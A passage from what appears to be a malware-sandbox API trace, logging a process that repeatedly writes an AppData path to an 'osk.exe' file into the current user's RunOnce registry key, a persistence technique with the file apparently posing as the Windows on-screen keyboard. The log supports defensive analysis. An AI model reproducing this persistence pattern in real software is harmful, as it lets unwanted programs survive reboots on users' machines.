1 [0077.849] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.849] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.850] KillTimer (hWnd=0x20280, uIDEvent=0x2016) returned 1 [0077.850] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.850] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.850] IUnknown:Release (This=0x787518) returned 0x1 [0077.850] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.850] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.850] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.850] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.850] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.850] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.850] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.850] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.851] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.851] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x17 [0077.851] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.851] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x18 [0077.851] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.851] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x17 [0077.852] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.852] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.852] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.852] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.852] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.852] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.852] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.852] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.852] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.852] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.852] RegCloseKey (hKey=0x280) returned 0x0 [0077.852] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.852] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.852] SetTimer (hWnd=0x20280, nIDEvent=0x2017, uElapse=0xa, lpTimerFunc=0x0) returned 0x2017 [0077.853] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.865] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.865] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.865] KillTimer (hWnd=0x20280, uIDEvent=0x2017) returned 1 [0077.865] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.865] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.866] IUnknown:Release (This=0x787518) returned 0x1 [0077.866] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.866] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.866] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.866] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.866] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x18 [0077.866] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.866] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x19 [0077.866] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.867] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x18 [0077.867] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.867] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.867] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.867] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.867] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.867] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.868] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.868] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.868] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.868] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.868] RegCloseKey (hKey=0x280) returned 0x0 [0077.868] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.868] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.868] SetTimer (hWnd=0x20280, nIDEvent=0x2018, uElapse=0xa, lpTimerFunc=0x0) returned 0x2018 [0077.868] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.883] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.883] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.884] KillTimer (hWnd=0x20280, uIDEvent=0x2018) returned 1 [0077.884] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.884] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.884] IUnknown:Release (This=0x787518) returned 0x1 [0077.884] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.884] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.884] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.885] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.885] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.885] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x19 [0077.885] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.885] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1a [0077.885] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.886] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x19 [0077.886] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.886] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.886] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.886] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.886] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.886] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.886] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.886] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.887] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.887] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 